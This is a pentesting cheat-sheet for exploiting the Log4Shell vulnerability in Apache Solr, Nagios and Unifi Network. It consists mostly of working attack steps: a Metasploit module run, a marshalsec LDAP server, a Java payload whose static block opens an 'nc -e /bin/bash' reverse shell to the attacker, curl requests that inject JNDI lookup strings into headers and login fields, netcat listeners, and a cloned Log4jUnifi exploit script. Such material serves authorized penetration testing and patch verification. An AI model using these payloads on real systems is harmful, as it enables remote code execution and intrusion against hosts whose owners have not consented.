# Log4j Pentesting

Log4j has zero-day vulnerabilities to Log4Shell, Log4Unifi.

```shellscript
msfconsole
msf> use exploit/multi/http/log4shell_header_injection
msf> set HTTP_HEADER ACCEPT
msf> set RHOSTS <target-ip>
msf> set SRVHOST <local-ip>
msf> set SRVPORT 1389
# e.g. Nagios
msf> set TARGETURI /~logs
msf> set LHOST <local-ip>
msf> run
shell
```

### Exploit Apache Solr (JNDI) <a href="#exploit-apache-solr-jndi" id="exploit-apache-solr-jndi"></a>

You need to prepare your four local terminals.

#### 1. Start LDAP Server on Your Local Terminal 1 <a href="#id-1-start-ldap-server-on-your-local-terminal-1" id="id-1-start-ldap-server-on-your-local-terminal-1"></a>

1. **Install Maven**

   ```shellscript
   sudo apt install maven
   ```
2. **Get the Payload**

   Download the repository.

   ```shellscript
   git clone https://github.com/mbechler/marshalsec.git
   cd marshalsec
   ```

   Then build the marshalsec utility

   ```shellscript
   mvn clean package -DskipTests
   ```
3. **Start LDAP Server**

   ```shellscript
   java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your-local-ip>:8000/#Exploit"
   ```

#### 2. Host the Exploit on Your Local Terminal 2 <a href="#id-2-host-the-exploit-on-your-local-terminal-2" id="id-2-host-the-exploit-on-your-local-terminal-2"></a>

1. **Create the Exploit with Java**

   First, create a new directory and create a new exploit named "Exploit.java" in the directory.\
   Open your favorite editor like vim.

   ```shellscript
   mkdir exploit
   cd exploit
   vim Exploit.java
   ```

   In editor, enter the following code.

   ```shellscript
   public class Exploit {
   static {
       try {
           java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <your-local-ip> <your-local-listener-port>");
       } catch (Exception e) {
           e.printStackTrace();
       }
   }
   }
   ```
2. **Compile the Payload**

   ```shellscript
   javac Exploit.java -source 8 -target 8
   ```
3. **Start Web Server to Host the Payload**

   ```shellscript
   python3 -m http.server 8000
   ```

#### 3. Open Listener on Your Local Terminal 3 <a href="#id-3-open-listener-on-your-local-terminal-3" id="id-3-open-listener-on-your-local-terminal-3"></a>

```shellscript
nc -lvnp <your-local-listener-port>
```

#### 4. Send Request the Target Website <a href="#id-4-send-request-the-target-website" id="id-4-send-request-the-target-website"></a>

```shellscript
# Apache Solr
curl 'http://<target-ip>:<target-port>/solr/admin/cores?foo=${jndi:ldap://<local-ip>:1389/Exploit}'

# Nagios
curl http://<target-ip>:<target-port>/~logs -H 'Accept: ${jndi:ldap://<local-ip>:1389/Exploit}'
```

### Exploit Unifi Network using Log4Unifi <a href="#exploit-unifi-network-using-log4unifi" id="exploit-unifi-network-using-log4unifi"></a>

**Log4Unifi** is an exploitation Log4j tool in **Unifi Network**.

#### 1. Test the Vulnerability in the Target Web Page <a href="#id-1-test-the-vulnerability-in-the-target-web-page" id="id-1-test-the-vulnerability-in-the-target-web-page"></a>

```shellscript
curl -i -s -k -X POST -H $'Host: vulnerable.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://9ulral.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://<target-ip>:8443/api/login'
```

#### 2. Open Listener on Your Local Machine <a href="#id-2-open-listener-on-your-local-machine" id="id-2-open-listener-on-your-local-machine"></a>

```shellscript
nc -lvnp 4444
```

#### 3. Exploit <a href="#id-3-exploit" id="id-3-exploit"></a>

Download the exploit from [the repository](https://github.com/puzzlepeaches/Log4jUnifi).

```shellscript
git clone https://github.com/puzzlepeaches/Log4jUnifi
cd Log4Unifi
```

Exploit

```shellscript
python exploit.py -u https://<target-ip>:8443 -i <your-local-ip> -p 4444
```